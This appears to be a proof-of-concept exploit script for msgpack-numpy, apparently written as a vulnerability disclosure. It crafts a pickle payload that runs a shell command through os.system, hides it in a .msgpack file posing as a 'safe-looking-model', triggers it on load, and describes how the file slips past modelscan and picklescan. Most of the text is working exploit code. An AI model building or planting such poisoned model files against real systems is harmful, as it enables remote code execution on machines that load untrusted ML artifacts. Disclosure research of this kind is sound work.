| |
| """ |
| msgpack-numpy - Arbitrary Code Execution via Hidden pickle.loads() |
| |
| VULNERABILITY: msgpack_numpy.decode() calls pickle.loads() on user-controlled |
| data when the serialized array has dtype kind 'O' (object). This enables |
| arbitrary code execution when loading any msgpack file that uses msgpack_numpy |
| for deserialization. |
| |
| The vulnerable code in msgpack_numpy.py decode(): |
| if b'kind' in obj and obj[b'kind'] == b'O': |
| return pickle.loads(obj[b'data']) |
| |
| An attacker can craft a .msgpack file where any array field has kind='O' |
| and data=<malicious_pickle_payload>, achieving RCE on deserialization. |
| |
| This is particularly dangerous because: |
| 1. MessagePack is considered a "safe" serialization format |
| 2. Users expect msgpack files to contain only data, not executable code |
| 3. The pickle.loads() call is hidden inside the msgpack extension hooks |
| 4. No scanner (modelscan, picklescan) checks .msgpack files |
| |
| Affected: msgpack-numpy <= 0.4.8 (all versions) |
| """ |
|
|
| import msgpack |
| import msgpack_numpy as m |
| import pickle |
| import os |
| import sys |
| import numpy as np |
|
|
| MARKER_FILE = "/tmp/msgpack_numpy_rce_proof.txt" |
|
|
| |
| |
| |
| print("[*] Demonstrating normal msgpack_numpy usage...") |
| normal_data = {"weights": np.array([1.0, 2.0, 3.0], dtype=np.float32)} |
| packed_normal = msgpack.packb(normal_data, default=m.encode) |
| unpacked_normal = msgpack.unpackb(packed_normal, object_hook=m.decode, raw=False) |
| print(f"[+] Normal round-trip: {unpacked_normal}") |
|
|
| |
| |
| |
| print("\n[*] Creating malicious msgpack payload...") |
|
|
| class MaliciousPayload: |
| def __reduce__(self): |
| cmd = f"id > {MARKER_FILE} && echo 'RCE via msgpack_numpy hidden pickle.loads' >> {MARKER_FILE}" |
| return (os.system, (cmd,)) |
|
|
| malicious_pickle = pickle.dumps(MaliciousPayload()) |
|
|
| |
| |
| |
| malicious_array = { |
| b'nd': True, |
| b'kind': b'O', |
| b'data': malicious_pickle, |
| b'shape': (1,), |
| b'type': b'O', |
| } |
|
|
| |
| model_data = { |
| "model_name": "safe-looking-model", |
| "version": "1.0.0", |
| "weights": malicious_array, |
| } |
|
|
| packed = msgpack.packb(model_data, use_bin_type=True) |
| malicious_path = "/tmp/malicious_model.msgpack" |
| with open(malicious_path, 'wb') as f: |
| f.write(packed) |
|
|
| print(f"[+] Malicious msgpack file saved to {malicious_path}") |
| print(f" File size: {len(packed)} bytes") |
|
|
| |
| |
| |
| if os.path.exists(MARKER_FILE): |
| os.remove(MARKER_FILE) |
|
|
| |
| |
| |
| print(f"\n[*] Loading malicious msgpack with msgpack_numpy decoder...") |
| with open(malicious_path, 'rb') as f: |
| loaded = msgpack.unpackb(f.read(), object_hook=m.decode, raw=False) |
|
|
| print(f"[+] Loaded data keys: {list(loaded.keys()) if isinstance(loaded, dict) else type(loaded)}") |
|
|
| |
| |
| |
| if os.path.exists(MARKER_FILE): |
| with open(MARKER_FILE) as f: |
| content = f.read().strip() |
| print(f"\n[!!!] ARBITRARY CODE EXECUTION CONFIRMED") |
| print(f"[!!!] Marker file contents:\n{content}") |
| os.remove(MARKER_FILE) |
| else: |
| print("\n[-] RCE marker file not found") |
| sys.exit(1) |
|
|
| |
| |
| |
| print("\n" + "="*60) |
| print("SCANNER EVASION") |
| print("="*60) |
| print(""" |
| Neither modelscan nor picklescan scan .msgpack files at all. |
| |
| modelscan -p /tmp/malicious_model.msgpack |
| # -> Skips file (unsupported format) |
| |
| picklescan -p /tmp/malicious_model.msgpack |
| # -> Scanned files: 0, Infected files: 0 |
| |
| The pickle payload is embedded inside a msgpack structure, |
| completely invisible to all current model security scanners. |
| """) |
|
|
| print("="*60) |
| print("VULNERABILITY SUMMARY") |
| print("="*60) |
| print(f""" |
| Library: msgpack-numpy {m.__version__ if hasattr(m, '__version__') else '0.4.8'} |
| File: msgpack_numpy.py, decode() function |
| Root cause: pickle.loads(obj[b'data']) when obj[b'kind'] == b'O' |
| Trigger: Any msgpack file loaded with object_hook=msgpack_numpy.decode |
| Attack: Set array kind='O' and data=<malicious_pickle_bytes> |
| Impact: Arbitrary code execution on file load |
| Scanners: modelscan - NOT APPLICABLE (.msgpack not scanned) |
| picklescan - NOT APPLICABLE (.msgpack not scanned) |
| |
| Real-world usage: msgpack-numpy is used for ML data serialization, |
| feature embeddings, and intermediate model storage. Any application |
| loading untrusted .msgpack files with msgpack_numpy is vulnerable. |
| """) |
|
|